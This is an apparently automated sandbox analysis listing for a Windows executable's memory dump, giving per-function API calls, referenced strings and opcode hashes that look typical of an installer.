                                                                                                                                        • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                                                        • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                                        • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                        • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                                        • String ID: Creating directory: %s
                                                                                                                                        • API String ID: 2451617938-483064649
                                                                                                                                        • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                                        • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                                                        • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                                        • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressByteCharMultiProcWide
                                                                                                                                        • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                        • API String ID: 2508298434-591603554
                                                                                                                                        • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                                        • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                                                        • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                                        • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                                                        APIs
                                                                                                                                        • 755A1520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                                                        • 755A1500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                                                        • 755A1540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: A1500A1520A1540
                                                                                                                                        • String ID: %E
                                                                                                                                        • API String ID: 2563864905-175436132
                                                                                                                                        • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                                        • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                                                        • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                                        • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0044B401
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectReleaseSelect
                                                                                                                                        • String ID: %H
                                                                                                                                        • API String ID: 1831053106-1959103961
                                                                                                                                        • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                                        • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                                                        • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                                        • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                                                        • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                                                        • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DrawText$ByteCharMultiWide
                                                                                                                                        • String ID: %H
                                                                                                                                        • API String ID: 65125430-1959103961
                                                                                                                                        • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                                        • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                                                        • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                                        • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                                                        APIs
                                                                                                                                        • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                        • API String ID: 395431579-1506664499
                                                                                                                                        • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                                        • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                                                        • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                                        • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                                                        Strings
                                                                                                                                        • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                                                        • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                                                        • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                        • API String ID: 47109696-2115312317
                                                                                                                                        • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                                                        • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                                                        • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                                                        • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                                                                        APIs
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                                                        • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                                                        • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2066263336-0
                                                                                                                                        • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                                                        • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                                                        • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                                                        • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                                                        APIs
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                                                        • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                                                        • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2066263336-0
                                                                                                                                        • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                                                        • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                                                        • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                                                        • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(00000000), ref: 00421361
                                                                                                                                        • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                                                        • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3711407533-0
                                                                                                                                        • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                                                        • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                                                        • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                                                        • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 601730667-0
                                                                                                                                        • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                                                        • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                                                        • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                                                        • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0042311E
                                                                                                                                        • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDeviceEnumFontsRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2698912916-0
                                                                                                                                        • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                                        • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                                                        • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                                                        • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                        • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                                                        Strings
                                                                                                                                        • NumRecs range exceeded, xrefs: 0045C396
                                                                                                                                        • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$BuffersFlush
                                                                                                                                        • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                        • API String ID: 3593489403-659731555
                                                                                                                                        • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                                                        • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                                                        • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                                                        • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                                                          • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                                                          • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                          • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                                          • Part of subcall function 004063C4: 6FDA1CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                                                          • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                                                          • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                                                          • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                                          • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                                                          • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                                          • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                                          • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                                          • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                                          • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                                                          • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
